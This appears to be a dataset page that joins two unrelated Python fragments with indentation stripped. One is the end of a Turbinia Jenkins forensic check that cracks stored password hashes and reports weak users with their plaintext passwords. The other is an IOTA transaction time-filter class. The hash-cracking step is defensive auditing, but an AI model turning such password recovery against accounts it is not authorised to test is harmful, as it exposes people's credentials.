priority = Priority.LOW
credentials_registry = {hash: username for username, hash in credentials}
# TODO: Add timeout parameter when dynamic configuration is ready.
# Ref: https://github.com/google/turbinia/issues/244
weak_passwords = bruteforce_password_hashes(credentials_registry.keys())
if not version:
version = 'Unknown'
report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))
if weak_passwords:
priority = Priority.CRITICAL
summary = 'Jenkins analysis found potential issues'
report.insert(0, fmt.heading4(fmt.bold(summary)))
line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
report.append(fmt.bullet(fmt.bold(line)))
for password_hash, plaintext in weak_passwords:
line = 'User "{0:s}" with password "{1:s}"'.format(
credentials_registry.get(password_hash), plaintext)
report.append(fmt.bullet(line, level=2))
elif credentials_registry or version != 'Unknown':
summary = (
'Jenkins version {0:s} found with {1:d} credentials, but no issues '
'detected'.format(version, len(credentials_registry)))
report.insert(0, fmt.heading4(summary))
priority = Priority.MEDIUM
else:
summary = 'No Jenkins instance found'
report.insert(0, fmt.heading4(summary))
report = '\n'.join(report)
return (report, priority, summary)
|
from typing import Callable
from datetime import datetime, timezone
from time import mktime
from ..common.const import (
MILESTONES_USING_TIMESTAMP_ONLY,
TIMESTAMP_B,
TIMESTAMP_E,
ATCH_TIMESTAMP_B,
ATCH_TIMESTAMP_E
)
from ..common import tryte_to_int
import logging
__all__ = [
'TimeFilter',
]
class TimeFilter():
"""
Time filter for transaction
Attributes
----------
min : int
The private earliest Unix epoch time for filtering
max : int
The private latest Unix epoch time for filtering
Methods
-------
make_filter()
Return the built time filter
"""
def __init__(self, start_date: str, end_date: str) -> None:
"""
Parameters
----------
start_date : str
The start_date (%Y%m%d) of transaction to monitor (e.g., "20200101")
end_date : str
The end_date (%Y%m%d) of transaction to monitor (e.g., "20200201")
"""
try:
self._min = mktime(datetime.strptime(
start_date, "%Y%m%d").timetuple())
self._max = mktime(datetime.strptime(
end_date, "%Y%m%d").timetuple())
except:
logging.error("Dates {} and {} are not supported!".format(
start_date, end_date))
logging.error("Plese use \"%Y%m%d\" instead, e.g., \"20200101\"")
def _get_transaction_dmp(self, timestamp: int, attachmenttimestame: int, milestone: str) -> int:
if milestone in MILESTONES_USING_TIMESTAMP_ONLY:
return timestamp
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp
def _get_transaction_time(self, timestamp: int, attachmenttimestame: int) -> int:
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp
def _time_range_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _time_filter_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _time_filter_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _time_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _time_range_with_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _time_filter_equal_to_or_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _time_filter_equal_to_or_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _dmptime_range_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _dmptime_filter_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _dmptime_filter_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _dmptime_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _dmptime_range_with_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _dmptime_filter_equal_to_or_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _dmptime_filter_equal_to_or_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _time_range_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max and t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t == self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_range_with_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max and t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def make_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function.
Parameters
----------
range_larger_smaller_equal (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._time_range_filter_str
elif range_larger_smaller == 'm':
return self._time_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._time_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._time_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._time_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._time_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._time_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
def make_dmp_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function for dmp data.
When using this filter, the milestone for each transaction should be indicated.
Parameters
----------
range_larger_smaller_equal (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._dmptime_range_filter_str
elif range_larger_smaller == 'm':
return self._dmptime_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._dmptime_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._dmptime_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._dmptime_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._dmptime_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._dmptime_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.